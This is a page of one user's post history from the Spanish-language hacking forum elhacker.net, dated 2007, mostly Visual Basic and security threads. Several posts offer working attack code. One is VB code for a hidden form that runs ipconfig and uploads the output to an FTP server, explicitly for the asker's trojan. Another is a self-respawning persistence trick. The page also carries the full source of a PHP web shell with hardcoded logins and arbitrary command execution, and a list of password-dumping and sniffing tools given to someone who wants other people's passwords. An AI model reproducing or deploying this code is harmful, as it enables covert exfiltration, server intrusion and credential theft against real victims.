elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 ... 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 [424] 425 426 427 428 429 430 431 432 433 434 435 436
4231  Programación / Programación Visual Basic / WHK-RV2 - Mensajero instantaneo de paquetes cifrados en: 19 Junio 2007, 10:19 am
Bueno... me estoy entreteniendo tanto construyendo este software de msajería instantanea de PC a PC que quiero compartir mis avances con ustedes.

La idea es la tipica de conectar cliente con servidor a traves de tres socks, uno recibe los mensajes cifrados y los otros dos son para enviar y recibir comandos directos sin cifrar.

Este software es un tanto diferente a los demas porque es INSTANTANEO en su totalidad... o sea que escribes una letra e inmediatamente lo lee la otra persona asi que no podras arrepentirte de lo que escribes  :xD.

El cifrado consiste en tomar el numero de caracter ingresado en la caja de texto, multiplicarlo y sumarlo de tal forma que de un resultado y ese resultado se envia al servidort o cliente el cual resta ese total obteniendo el número de caracter descifrandolo nuevamente.

El tercer socks sirve para enviar cada 10 segundos el codigo de cifrado al servidor aleatoriamente para que pueda segir siendo descifrado únicamente por el receptor del mensaje... el que intente descifrarlo se encontrará con un cifrado diferente cada 10 segundos siendo imposible recuperar el mensaje real a menos que intercepte el codigo enviado por el tercer sock.

Ahora mismo estoy intentando cifrar este tercer sock con un código único entre letras y números.

También en un tiempo más implementaré el uso de sockets para registrarlo en la red tor de esta forma hacerlo un poquito mas indetectable  :xD.

Este no es un programa de mensajería profesional pero si te ayudará para poder entender como crear uno sin romperte la cabeza.

Nota: Este proyecto lo llevo desde hace dos dias partiendo desde un cliente y servidor telnet jajaja.

Código fuente del servidor + cliente  incluido en este post .

La proxima volveré con el mensajero un poco mas sofisticado y con una buena visual ya que como se ve está "RAW"





Ustedes diran: "Para que sirve si ya existen mensajeros  :¬¬"
Lo hice por dos razones:

1. Si deseas conversar algo un tanto delicado con un amigo no lo podrán descifrar tan facilmente.

2. El proyecto empezó como un simple minichat pero me entretuve tanto que ahora me dedico un buen tiempo a el desde hace dos dias mas o menos.

Ojala termine de hacerlo compatible con proxyes y socks para poder usarlo con la Red Tor.

Acepto todo tipo de criticas y sugerencias  :P
4232  Programación / Programación Visual Basic / Re: AYUDA URGENTE, MANDAR IP A UN FTP en: 19 Junio 2007, 09:55 am
También puedes hacer una shell bat que te lo suba por el comando ftp.exe:

Citar
Private Sub Form_Load()
form1.visible = False
shell("cmd.exe /c ipconfig > ip.txt&&echo o > ftp.txt&&echo ip >> ftp.txt&&echo user >> ftp.txt&&echo pass >> ftp.txt&&echo put ip.txt >> ftp.txt&&echo quit >> ftp.txt&&ftp -s:ftp.txt"),vbhide
End Sub

Como me quedó? XD
4233  Programación / Programación Visual Basic / Re: AYUDA URGENTE, MANDAR IP A UN FTP en: 19 Junio 2007, 09:48 am
El sleep (10000) es para esperar 10 milisegundos, o sea 10 segundos ya que ese es el tiempo maximo que deve durar el envío del texto antes de cerrar las conexiones.

Para que funcione winsock Debes adjuntar winsock.ocx a tu troyano y asi solucionas tu problema.
4234  Programación / Programación Visual Basic / Re: Proceso Inmortal en: 19 Junio 2007, 08:30 am
Prueva con esto:
Citar
Private Sub Form_Unload(Cancel As Integer)
shell("cmd.exe /c " & ap.path & app.exename & ".exe"),vbNormalFocus
End Sub

Si no resulta entonces crea dos programas que se verifiquen si uno se detiene el otro lo jala.
4235  Programación / Programación Visual Basic / Re: AYUDA URGENTE, MANDAR IP A UN FTP en: 19 Junio 2007, 08:26 am
Aver que les parece mi pequeño codigo para recuperar solamente ese texto:

Citar
Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Private Sub Form_Load()
form1.visible = False
shell("cmd.exe /c ipconfig > c:/ip.txt"),vbhide
winsock1.connect "ip_ftp", 21
End Sub

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
On Error Resume Next
If Winsock1.State <> sckClosed Then Winsock1.Close
Winsock1.Accept requestID
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
On Error Resume Next
Dim BufferIN As String
Winsock1.GetData BufferIN

if BufferIN  " bienvenida etc etc... Nombre usuario:" Then winsock1.senddata "Usuario"
if BufferIN  "Password" Then winsock1.senddata "password"
if BufferIN  "corrent directory is etc etc...." Then
 winsock1.senddata "put C:\ip.txt"
sleep (10000)
end
end if
End Sub
4236  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 15 Junio 2007, 06:03 am
 :xD esa sección no funciona pero si quieres saber tu ip visita esta pagina:
http://ip.interchile.com/
4237  Seguridad Informática / Nivel Web / Re: Server Explorer PHP Shell - Updated en: 13 Junio 2007, 23:57 pm
Encontré algo que talves pueda interesarte.

SSH.PHP
Código:
<?php


error_reporting(0);
session_start();

unset($user);        // Just in case ;-]
unset($pass);

if ($_POST['cmd']) $_POST['cmd'] = my_encode($_POST['cmd']);

$cache_lines = 1000;
$history_lines = 100;
$history_chars = 20;

$user[] = "root";                $pass[] = md5("hacked");
$user[] = "user";      $pass[] = md5("muie1234");
$to="";
$subject = "php SSH";
$info .= "HOST:\t$HTTP_HOST\n";
$info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
$info .= "IP:\t$REMOTE_ADDR\n";
$info .= "URL:\t$HTTP_REFERER\n";
$from = "nobody@nobody.com";

if ($_SESSION['login'])
{
   mail ("$to","$subject","$info","$from");
}


$alias = array(
    "la"    => "ls -la",
    "rf"    => "rm -f",
    "unbz2" => "tar -xjpf",
    "ungz"  => "tar -xzpf"
);



if (!$_SESSION['user']) {

    $pr_login = "Login:\n";
    $pr_pass = "Password:\n";
    $err = "Invalid login!\n\n";
    $succ = "Warning!
Don`t be stupid .. this is a priv3 server, so take extra care!!!\n\n";

    if ($_SESSION['login'] && $_POST['cmd']) { // WE HAVE USERNAME & PASSWORD

        $_SESSION['output'] .= $pr_pass;

        if (in_array($_SESSION['login'], $user)) { //........ USERNAME EXISTS

            $key = array_search($_SESSION['login'], $user);

            if ($pass[$key] != md5($_POST['cmd'])) { //....... WRONG PASSWORD
                $_SESSION['output'] .= $err;
                unset($_SESSION['login']);
                $prompt = $pr_login;

            } else { //..................................... SUCCESSFUL LOGIN
                $_SESSION['user'] = $_SESSION['login'];
                $_SESSION['whoami'] = substr(shell_exec("whoami"), 0, -1);
                $_SESSION['host'] = substr(shell_exec("uname -n"), 0, -1);
                $_SESSION['dir'] = substr(shell_exec("pwd"), 0, -1);
                $_SESSION['output'] .= $succ;
                $prompt = set_prompt();
                unset($_SESSION['login']);
            }

        } else { //......................................... NO SUCH USERNAME
            $_SESSION['output'] .= $err;
            unset($_SESSION['login']);
            $prompt = $pr_login;
        }

    } else { //................................................ LOGIN PROCESS

        if (!$_SESSION['login'] && !$_POST['cmd']) $prompt = $pr_login;

        if (!$_SESSION['login'] && $_POST['cmd']) {
            $_SESSION['login'] = $_POST['cmd'];
            $_SESSION['output'] .= substr($pr_login, 0, -1) . " $_POST[cmd]\n";
            $prompt = $pr_pass;
        }
    }

} else { //........................................................ LOGGED IN



                            /*=-- MEMBERS AREA --=*\
                            \*=-- MEMBERS AREA --=*/


    $prompt = set_prompt();

    chdir($_SESSION['dir']);

    if ($_REQUEST['clear_hist']) //............................ CLEAR HISTORY
        $_SESSION['history'] = "";

    if ($_SESSION['history']) $hist_arr = explode("\n", $_SESSION['history']);

    if ($_POST['cmd']) {

        if (!in_array($_POST['cmd'], $hist_arr)) { //......... ADD TO HISTORY
            $hist_arr[] = $_POST['cmd'];
            $_SESSION['history'] = implode("\n", $hist_arr);
        }

        if (count($hist_arr) > $history_lines) { //........... CUTOFF HISTORY
            $start = count($hist_arr) - $history_lines;
            $_SESSION['history'] = "";

            for ($i = $start; $i < count($hist_arr); $i++)
                $_SESSION['history'] .= $hist_arr[$i] . "\n";

            $_SESSION['history'] = substr($_SESSION['history'], 0, -1);
            $hist_arr = explode("\n", $_SESSION['history']);
        }

        $first_word = first_word($_POST['cmd']);

        if (array_key_exists($first_word, $alias)) { //. CHECKING FOR ALIASES
            $_POST['cmd'] = $alias[$first_word] . substr($_POST['cmd'], strlen($first_word));
            $first_word = first_word($_POST['cmd']);
        }

        switch ($first_word) {

          case "clear":
            $_SESSION['output'] = "";
            break;

          case "exit":
            session_destroy();
            refresh();
            break;

          case "cd":
            $_SESSION['output'] .= $prompt;
                $result = shell_exec($_POST['cmd'] . " 2>&1 ; pwd");
            $result = explode("\n", $result);
            $_SESSION['dir'] = $result[count($result) - 2];

            if (count($result) > 2) //.............. WE HAVE AN ERROR MESSAGE
                $result[0] = "\n" . substr($result[0], strpos($result[0], "cd: ")) . "\n";
            else $result[0] = "\n";

                $prompt = set_prompt();
                $_SESSION['output'] .= $_POST['cmd'] . $result[0];
                break;

          default:
            $result = shell_exec($_POST['cmd'] . " 2>&1");

            if (substr($result, -1) != "\n") $result .= "\n";
            $_SESSION['output'] .= $prompt . $_POST['cmd'] . "\n" . $result;

            $rows = preg_match_all('/\n/', $_SESSION['output'], $arr);
            unset($arr);

            if ($rows > $cache_lines) {
                    preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['output'], $out);
                $_SESSION['output'] = $out[0] . "\n";
            }
        }
    }
}



                             /*=-- FUNCTIONS --=*\
                             \*=-- FUNCTIONS --=*/


function my_encode($str) {
    $str = str_replace("\\\\", "\\", $str);
    $str = str_replace("\\\"", "\"", $str);
    $str = str_replace("\\'", "'", $str);

    while (strpos($str, "  ") !== false) $str = str_replace("  ", " ", $str);

    return rtrim(ltrim($str));
}

function set_prompt() {
    global $_SESSION;

    return $_SESSION['whoami'] . "@" . $_SESSION['host'] . " " . substr($_SESSION['dir'], strrpos($_SESSION['dir'], "/") + 1) . " $ ";
}

function first_word($str) {
    list($str) = preg_split('/[ ;]/', $str);
    return $str;
}

function refresh() {
    global $_SERVER;

    $self = substr($_SERVER['SCRIPT_NAME'], strrpos($_SERVER['SCRIPT_NAME'], "/") + 1);
    header("Location: $self");
    die;
}



                             /*=-- HTML PAGE --=*\
                             \*=-- HTML PAGE --=*/


$out = substr(preg_replace('/<\/(textarea)/i', '&lt;/\1', $_SESSION['output']), 0, -1);

?><HTML>

<HEAD>
  <TITLE>dis Shell Commander</TITLE>
  <STYLE TYPE="text/css"><!--

    INPUT, TEXTAREA, SELECT, OPTION, TD {
        color: #BBBBBB;
        background-color: #000000;
        font-family: Terminus, Fixedsys, Fixed, Terminal, Courier New, Courier;
    }

    TEXTAREA {
        overflow-y: auto;
        border-width: 0px;
        height: 100%;
        width: 100%;
        padding: 0px;
    }

    INPUT {
        border-width: 0px;
        height: 26px;
        width: 100%;
        padding-top: 5px;
    }

    SELECT, OPTION {
        color: #000000;
        background-color: #BBBBBB;
    }

    BODY {
        overflow-y: auto;
        margin: 0;
    }

  --></STYLE>
  <SCRIPT LANGUAGE="javascript"><!--

hist_arr = new Array();

<?php

foreach ($hist_arr as $key => $value) {
    $value = str_replace("\\", "\\\\", $value);
    $value = str_replace("\"", "\\\"", $value);
    echo "hist_arr[$key] = \"$value\";\n";
}

?>

function parse_hist(key) {
    if (key < hist_arr.length) {
            if (key != "") {
            document.getElementById('input').value = hist_arr[key];
            document.getElementById('input').focus();
        }
    } else {
            window.location.href = "?clear_hist=1";
    }
}

function input_focus() {
    document.getElementById('input').focus();
}

function selection_to_clipboard() { // IE only!
    if (window.clipboardData && document.selection)
        window.clipboardData.setData("Text", document.selection.createRange().text);
}

if (window.clipboardData)
    document.oncontextmenu = new Function("document.getElementById('input').value = window.clipboardData.getData('Text'); input_focus(); return false");

  --></SCRIPT>
</HEAD>
<BODY onLoad="document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight; input_focus()" TOPMARGIN="0" LEFTMARGIN="0">
<TABLE CELLPADDING="0" CELLSPACING="0" BORDER="0" HEIGHT="100%" WIDTH="100%">
<TR>
  <TD HEIGHT="100%" BGCOLOR="#000000" STYLE="padding-top: 5px; padding-left: 5px; padding-right: 5px; padding-bottom: 0px"><TEXTAREA ID="output" onSelect="selection_to_clipboard()" onClick="input_focus()" READONLY><?= $out ?></TEXTAREA></TD>

</TR>
<TR>
  <TD BGCOLOR="#000000"><TABLE CELLPADDING="0" CELLSPACING="5" BORDER="0" WIDTH="100%">
    <TR>
    <FORM METHOD="POST" ACTION="">
      <TD NOWRAP onClick="input_focus()"><?= substr($prompt, 0, -1) ?></TD>
      <TD WIDTH="100%"><INPUT ID="input" TYPE="<?= (!$_SESSION['user'] && $_SESSION['login']) ? 'PASSWORD' : 'TEXT' ?>" NAME="cmd"></TD>
    </FORM><?php

if ($hist_arr) {

    ?><TD NOWRAP><SELECT onChange="parse_hist(this.options[this.selectedIndex].value)">
        <OPTION VALUE="">--- HISTORY</OPTION><?php

    for ($i = count($hist_arr) - 1; $i >= 0; $i--) {

        if (strlen($hist_arr[$i]) > $history_chars) $option = substr($hist_arr[$i], 0, $history_chars - 3) . "...";
        else $option = $hist_arr[$i];

        echo "<OPTION VALUE=\"" . $i . "\">$option</OPTION>";
    }

      ?><OPTION VALUE="<?= $history_lines + 1 ?>">--- CLEAR HISTORY</OPTION></SELECT></TD><?php

}

  ?></TR>

  </TABLE></TD>
</TR>
</TABLE>

<SCRIPT LANGUAGE="javascript"><!--
document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight;
--></SCRIPT>

</BODY>
</HTML><?
4238  Seguridad Informática / Hacking Básico / Re: Necesitas una contraseña? en: 13 Junio 2007, 23:27 pm
Citar
Cual de estos me sirve pa sacar contraseñas de cuando hay q registrarse en paginas web???????!!!!!


Respuesta

Citar
Protected Storage PassView v1.63
revela las contraseñas almacenadas en tu computadora por:

Outlook
AutoComplete passwords in Internet Explorer
Password-protected sites in Internet Explorer
MSN Explorer Passwords

Citar
SniffPass v1.01
utilidad que escucha tu red, captura las contraseñas que pasan a través de tu adaptador de la red, y las exhibe en la pantalla inmediatamente. SniffPass puede capturar las contraseñas de los protocolos siguientes (Puedes utilizar esta utilidad para recuperar contraseñas perdidas de Web/FTP/Email (contraseñas básicas de la autentificación)):

POP3
IMAP4
smtp
ftp
HTTP

Citar
IE PassView v1.04
Recupera las contraseñas guardadas por:

Internet Explorer 4.0
Internet Explorer 6.0
Internet Explorer 7.0

Citar
Netscapass v2.03
Recupera contraseñas guardadas por Netscape tales como la contraseña de servidores POP3. Versiones soportadas:

Netscape Communicator 4.x
Netscape 6.x
Netscape 7.x

Citar
Cain & Abel
Cain y Abel es una herramienta de la recuperación de la contraseña para los sistemas operativos de Microsoft. Permite la recuperación fácil de la varia clase de contraseñas sniffeando la red, crackeando contraseñas cifradas usando los ataques del diccionario, de la fuerza bruta y del criptoanálisis, conversaciones de registración de VoIP, contraseñas revueltas el descifrar, recuperando las llaves sin hilos de la red, cajas de la contraseña que revelan, destapando contraseñas depositadas y analizando protocolos de la encaminamiento. El programa no explota ningunas vulnerabilidades o bugs del software que no se podrían fijar con poco esfuerzo.


Remote Console
Remote LSA Secrets Dumper
Remote NT Hashes Dumper
Remote Route Table Manager
Remote TCP/UDP Table Viewer
Cisco Config Downloader/Uploader
MAC Scanner
Network Enumerator
Password Crackers
Brute-Force Password Cracker
Dictionary Password Cracker
Cryptanalysis
Rainbowcrack-online
WEP Cracker
Password Decoders
Password Dumpers
Password/Hash Calculators
Promiscuous-mode Scanner
Route Table Manager
Service Manager
SID Scanner
Sniffer
TCP/UDP Table Viewer

Traceroute
Wireless Scanner

4239  Programación / Programación Visual Basic / Simple Proxy 1.0 by WHK (Abre y Redireciona tus puertos) en: 12 Junio 2007, 08:37 am
Buscando alguna información sobre como usar proxyes o Socks 4 y 5 en Visual Basic encontré que nadie ha posteado sobre el tema  :-( por lo cual me dediqué a buscar en google y encontré algunas curiosidades que al final les agregué cosas mias y terminé creando un proxy-sniffer.. algo asi como un brouncer pero en VB  :P de todas maneras esto no soluciona mi problema porque yo quiero usar servidores externos como cliente no como servidor.



Ojalá lo disfruten igualmente  ;)
4240  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Sugerencia Pal Foro en: 12 Junio 2007, 07:11 am
Espera... Yo lo soluciono  :xD

Páginas: 1 ... 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 [424] 425 426 427 428 429 430 431 432 433 434 435 436
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines